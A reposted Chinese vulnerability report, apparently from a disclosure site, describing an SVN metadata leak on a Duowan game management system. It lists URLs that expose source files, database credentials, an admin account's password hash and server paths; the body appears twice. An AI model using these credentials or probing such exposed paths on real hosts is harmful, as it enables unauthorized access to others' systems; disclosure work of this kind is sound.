首頁 >後端開發 >php教程 >多玩某GM系统敏感信息泄漏

多玩某GM系统敏感信息泄漏

WBOY
WBOY原創
2016-06-23 13:20:14898瀏覽

首先是svn泄漏,

http://qa.tank.duowan.com/manage/.svn/entries

但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py

HOST = '127.0.0.1'

USER = 'tkgame'

PAWD = 'tkgame'

PORT = 0

DBNAME = 'tkt_manage'

#

EXECUTETYPE = 'update'

BUILDSQL = 'table_defines.sql'

UPDATELOG = 'update.ini'

UPDATETABLE = '_db_update_log'

BUILDUPDATESQL = '_db_update_log.sql'

BACKUPSQLPREFIX = 'bk_'

http://qa.tank.duowan.com/manage/sql/table_defines.sql

INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES

(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);

http://qa.tank.duowan.com/manage/i18n/config.sh

ROOT_PATH=/var/www/wwwroot/tkt/manage

I18N_PATH=$ROOT_PATH/i18n

I18N_DOMAIN=tkt_manage

LANG_LIST=(`/usr/bin/php -q getLangList.php`);

LEN_OF_LANG_LIST=${#LANG_LIST[@]}

首先是svn泄漏,

http://qa.tank.duowan.com/manage/.svn/entries

但是发现svn查看不了什么文件,但是可以知道大概目录,直接访问久暴露了源码http://qa.tank.duowan.com/manage/sql/dbcfg.py

HOST = '127.0.0.1'

USER = 'tkgame'

PAWD = 'tkgame'

PORT = 0

DBNAME = 'tkt_manage'

#

EXECUTETYPE = 'update'

BUILDSQL = 'table_defines.sql'

UPDATELOG = 'update.ini'

UPDATETABLE = '_db_update_log'

BUILDUPDATESQL = '_db_update_log.sql'

BACKUPSQLPREFIX = 'bk_'

漏洞证明:

http://qa.tank.duowan.com/manage/sql/table_defines.sql

INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES

(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);

http://qa.tank.duowan.com/manage/i18n/config.sh

ROOT_PATH=/var/www/wwwroot/tkt/manage

I18N_PATH=$ROOT_PATH/i18n

I18N_DOMAIN=tkt_manage

LANG_LIST=(`/usr/bin/php -q getLangList.php`);

LEN_OF_LANG_LIST=${#LANG_LIST[@]}

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn